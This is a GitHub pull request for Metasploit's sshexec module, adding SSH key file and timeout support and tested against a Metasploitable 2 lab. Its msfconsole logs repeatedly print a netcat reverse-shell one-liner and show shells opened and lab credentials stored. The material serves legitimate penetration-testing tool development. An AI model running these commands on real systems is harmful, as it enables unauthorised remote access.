sshexec: Timeout & KEY_FILE support by g0tmi1k · Pull Request #21508 · rapid7/metasploit-framework

g0tmi1k · 2026-05-26T22:49:57Z

This PR covers:

Use SSH mixin
Add check()
Add SSH_EXEC_TIMEOUT option & re-enable SSH_TIMEOUT support
Add KEY_FILE (and supports password protected)
Improve payload support
Update module metadata

Target is Metasploitable 2.

        current  name     hosts  services  vulns  creds  loots  notes
        -------  ----     -----  --------  -----  -----  -----  -----
Before: *        default  1      0         1      0      0      0
After : *        default  1      2         1      2      0      2

Setup

SSh keys has been pre-created & installed on the target ahead of time (came from doing another PR!)

Before

All testing was done using master branch
During targeting the wrong port, 21/TCP (aka FTP), had to manually kill the attack (CTRL+C) - wouldn't time out
Workspace only would get updated if successful result
- Service wasn't updated, nor was creds (even if successful)
Various "nags" with the payload choose

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   yes       The password to authenticate with.
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME  root             yes       The user to authenticate as.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > run RPORT=9999
[+] mkfifo /tmp/hktww; nc 10.0.0.1 4444 0</tmp/hktww | /bin/sh >/tmp/hktww 2>&1; rm /tmp/hktww
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: unreachable: Disconnected during negotiation
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > run RPORT=21
[+] mkfifo /tmp/cnzilef; nc 10.0.0.1 4444 0</tmp/cnzilef | /bin/sh >/tmp/cnzilef 2>&1; rm /tmp/cnzilef
[*] Started reverse TCP handler on 10.0.0.1:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] run: Interrupted
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  0      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > run
[+] mkfifo /tmp/njfopwh; nc 10.0.0.1 4444 0</tmp/njfopwh | /bin/sh >/tmp/njfopwh 2>&1; rm /tmp/njfopwh
[*] Started reverse TCP handler on 10.0.0.1:4444
[-] Exploit aborted due to failure: no-access: Failed authentication
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/cbeeb; nc 10.0.0.1 4444 0</tmp/cbeeb | /bin/sh >/tmp/cbeeb 2>&1; rm /tmp/cbeeb
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:22 - Sending stager...
[*] Executing mkfifo /tmp/iufubm; nc 10.0.0.1 4444 0</tmp/iufubm | /bin/sh >/tmp/iufubm 2>&1; rm /tmp/iufubm
[!] Timed out while waiting for command to return
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:52384) at 2026-05-26 23:18:06 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         1      0      0      0

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                     References
---------                ----       -------  --------  ----                     ----------
2026-05-26 22:18:05 UTC  10.0.0.10  None     {}        SSH User Code Execution  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) >

After

All testing was done on this branch, with SSH mixin (SSH mixin: New functions to help populate workspaces #21479) and auth_brute_mixin applied (Auth_Brute mixin: Add report_host/report_service & remove dup IP:PORT #21396)
Scanning a valid host, but closed port: 1 host
Scanning a valid host, open port, but incorrect: 1 host, 1 service
Scanning a valid host, and valid SSH service: 1 host, 2 services
Scanning a valid host, and valid SSH service with valid creds: Even more on the workspace ;)
Happier with the payload being used.

$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
setg PAYLOAD cmd/unix/reverse_netcat; set LHOST tap0;
use exploit/multi/ssh/sshexec;
set RHOSTS 10.0.0.10;
set target "Unix Cmd";
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
PAYLOAD => cmd/unix/reverse_netcat
LHOST => tap0
[*] Using configured payload cmd/unix/reverse_netcat
RHOSTS => 10.0.0.10
target => Unix Cmd

Module options (exploit/multi/ssh/sshexec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   KEY_FILE                   no        Path to an SSH private key file
   KEY_PASS                   no        Passphrase for the SSH private key
   PASSWORD                   no        The password to authenticate with
   RHOSTS    10.0.0.10        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     22               yes       The target port (TCP)
   SRVHOST                    no        The local host to listen on and use for incoming connections
   SRVSSL    false            no        Negotiate SSL/TLS for local server connections
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME                   yes       The user to authenticate as


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVPORT  8080             yes       The local port to listen on


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tap0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   12  Unix Cmd



View the full module info with the info, or info -d command.

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > run RPORT=9999 USERNAME=msfadmin
[+] mkfifo /tmp/xmidoo; nc 10.0.0.1 4444 0</tmp/xmidoo | /bin/sh >/tmp/xmidoo 2>&1; rm /tmp/xmidoo
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         0      0      0      0

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run RPORT=21 USERNAME=msfadmin
[+] mkfifo /tmp/nrmoxao; nc 10.0.0.1 4444 0</tmp/nrmoxao | /bin/sh >/tmp/nrmoxao 2>&1; rm /tmp/nrmoxao
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. Could not connect to SSH service "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > workspace -D
[*] Deleted workspace: default
[*] Recreated the default workspace
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin
[+] mkfifo /tmp/kdehpix; nc 10.0.0.1 4444 0</tmp/kdehpix | /bin/sh >/tmp/kdehpix 2>&1; rm /tmp/kdehpix
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Authentication failed - credentials may be incorrect "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         0      0      0      0

msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run USERNAME=msfadmin PASSWORD=msfadmin
[+] mkfifo /tmp/zrfooqg; nc 10.0.0.1 4444 0</tmp/zrfooqg | /bin/sh >/tmp/zrfooqg 2>&1; rm /tmp/zrfooqg
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/lkeekn; nc 10.0.0.1 4444 0</tmp/lkeekn | /bin/sh >/tmp/lkeekn 2>&1; rm /tmp/lkeekn
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:57105) at 2026-05-26 23:43:31 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 1? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      1      0      2

msf exploit(multi/ssh/sshexec) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Linux    Ubuntu     8.04   server

msf exploit(multi/ssh/sshexec) > services
Services
========

host       port  proto  name  state  info                                   resource  parents
----       ----  -----  ----  -----  ----                                   --------  -------
10.0.0.10  22    tcp    ssh   open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1  {}        tcp (22/tcp)
10.0.0.10  22    tcp    tcp   open                                          {}

msf exploit(multi/ssh/sshexec) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                       References
---------                ----       -------       --------  ----                       ----------
2026-05-26 22:43:24 UTC  10.0.0.10  ssh (22/tcp)  {}        exploit/multi/ssh/sshexec  CVE-1999-0502,ATT&CK-T1021.004

msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private   realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------   -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin         Password

msf exploit(multi/ssh/sshexec) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type         Data
 ----                     ----       -------  ----  --------  ----         ----
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.cpe      {:cpe=>"cpe:/o:canonical:ubuntu_linux:8.04"}
 2026-05-26 22:43:24 UTC  10.0.0.10  ssh      22    tcp       ssh.hostkey  {:type=>"ssh-rsa", :fingerprint=>"SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk"}

msf exploit(multi/ssh/sshexec) >

msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2
[-] Msf::OptionValidateError One or more options failed to validate: USERNAME.
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) >
msf exploit(multi/ssh/sshexec) > run KEY_FILE=/tmp/testkeys/rsa_2048_legacy_2 USERNAME=msfadmin
[+] mkfifo /tmp/dnhjnaa; nc 10.0.0.1 4444 0</tmp/dnhjnaa | /bin/sh >/tmp/dnhjnaa 2>&1; rm /tmp/dnhjnaa
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Credentials accepted
[*] 10.0.0.10:22 - Sending stager...
[*] Executing: mkfifo /tmp/biktw; nc 10.0.0.1 4444 0</tmp/biktw | /bin/sh >/tmp/biktw 2>&1; rm /tmp/biktw
[*] Command shell session 2 opened (10.0.0.1:4444 -> 10.0.0.10:49998) at 2026-05-26 23:46:36 +0100

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
^Z
Background session 2? [y/N]  y
msf exploit(multi/ssh/sshexec) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      2         1      2      0      2

msf exploit(multi/ssh/sshexec) > c
[-] Unknown command: c. Did you mean cd? Run the help command for more details.
msf exploit(multi/ssh/sshexec) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
585  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  msfadmin                                                Password
586  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  6d:5d:df:2c:e6:5e:dd:a6:db:0d:84:4d:7d:bc:4a:19         SSH key

msf exploit(multi/ssh/sshexec) >

Makes it more like ssh_login

g0tmi1k added 9 commits May 26, 2026 11:52

sshexec: Drop default user

5b8d038

Makes it more like ssh_login

sshexec: Fix timeout for cmd/unix/reverse_netcat

39e48fb

sshexec: Add check()

14cbde4

sshexec: Add KEY_FILE

48a9773

sshexec: Use SSH_TIMEOUT

02ea631

sshexec: Add SSH_EXEC_TIMEOUT

bf8c4d8

sshexec: Use SSH mixin - Add report_ssh_proof()

63e3712

sshexec: Handle binary payloads in output

68b61e3

sshexec: Update initialize & metadata

3caa893

smcintyre-r7 added this to Metasploit Kanban May 26, 2026

github-project-automation Bot moved this to Todo in Metasploit Kanban May 26, 2026

g0tmi1k mentioned this pull request May 27, 2026

SSH mixin: New functions to help populate workspaces #21479

Open

smcintyre-r7 self-assigned this May 28, 2026

smcintyre-r7 moved this from Todo to In Progress in Metasploit Kanban May 28, 2026

smcintyre-r7 removed their assignment May 28, 2026

smcintyre-r7 moved this from In Progress to Todo in Metasploit Kanban May 28, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

sshexec: Timeout & KEY_FILE support#21508

sshexec: Timeout & KEY_FILE support#21508
g0tmi1k wants to merge 9 commits into
rapid7:masterfrom
g0tmi1k:sshexec

g0tmi1k commented May 26, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants

Conversation

g0tmi1k commented May 26, 2026

Setup

Before

After

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

2 participants